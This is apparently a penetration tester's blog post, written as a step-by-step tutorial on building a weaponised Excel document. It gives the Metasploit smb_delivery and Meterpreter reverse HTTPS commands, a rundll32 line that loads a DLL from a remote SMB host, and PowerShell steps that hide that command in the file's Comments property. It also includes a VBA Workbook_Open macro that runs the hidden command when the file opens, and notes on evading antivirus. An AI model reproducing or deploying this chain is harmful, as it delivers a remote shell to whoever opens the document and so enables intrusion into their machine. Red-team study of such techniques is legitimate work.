As a penetration tester I’m always excited to see new and creative methods on creating weaponized MS Office documents.  This blog post builds on the following findings published by Black Hills InfoSec: https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/

There are numerous ways on how MS Office documents can be abused and weaponised to deliver a variety of cyber-related attacks.  This blog post will demonstrate how quickly and easy it is to hide a Metasploit and Empire payload within a MS Office document and execute it from an embedded Macro.

Metasploit:

In the first example I’m going to use a payload generated with Metasploits ‘SMB Delivery’ functionality to Weaponise a MS Excel document.  The ‘SMB Delivery’ is a personal favourite of mine given its simplicity and subtle anti-virus evasion.

Begin by loading the relevant module into Metasploit:

use exploit/windows/smb/smb_delivery

 

 

 

 

Set the payload to anything you desire, in this example I’ll be using the Windows Meterpreter Reverse HTTPS payload:

set PAYLOAD windows/meterpreter/reverse_https

 

 

 

Finally, issue the ‘exploit’ command to begin staging the attack:

 

Now, in order to utilise this, we will need execute the following command on the victim host:

rundll32.exe \\192.168.0.11\PPuUdw\test.dll,0

 

 

Note: the folder path is randomly generated as we didn’t explicitly define it within the Metasploit options

In order to achieve this, we’re going to embed this command into a MS Excel document within the ‘comments’ property and execute it from an embedded Macro.  This can easily be done by using the Powershell script: ‘Commentator’ (https://github.com/clr2of8/Commentator)

 

Begin by starting PowerShell:

powershell.exe -exec bypass

 

 

Import the module into your PowerShell environment:

Import-Module .\Commentator.ps1

 

 

And execute the script to embed our payload into the ‘comments’ property of the MS Excel document:

Invoke-Commentator -OfficeFile .\msf_smb_delivery.xlsx -Comment "rundll32.exe \\192.168.0.11\PPuUdw\test.dll,0"

 

 

 

After successful execution, a copy of your existing MS Office file will be created with the payload embedded:

The new file with added comment has been written to .\msf_smb_delivery-wlc.xlsx.

DONE!

This can be verified by inspecting the file’s metadata / properties:

 

Lastly, in order to execute the payload embedded within the ‘comments’ property, the following embedded Macro can be used:

 

Sub Workbook_Open()

Dim p As DocumentProperty

 

 For Each p In ActiveWorkbook.BuiltinDocumentProperties

    If p.Name = "Comments" Then

        Shell (p.Value)

    End If

 Next

End Sub

 

 

 

Note: In order to utilise auto-execution via the ‘Workbook_Open()’ function, the weaponised MS Excel document needed to be downgraded to Office 98 – 2003 compatibility (.xls)

After the victim has clicked ‘enable editing’ and ‘enable content’, a Meterpreter session should appear:

 


Kai Stimpson

Proud Parent, Senior Security Consultant, Weightlifter and Gardener.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: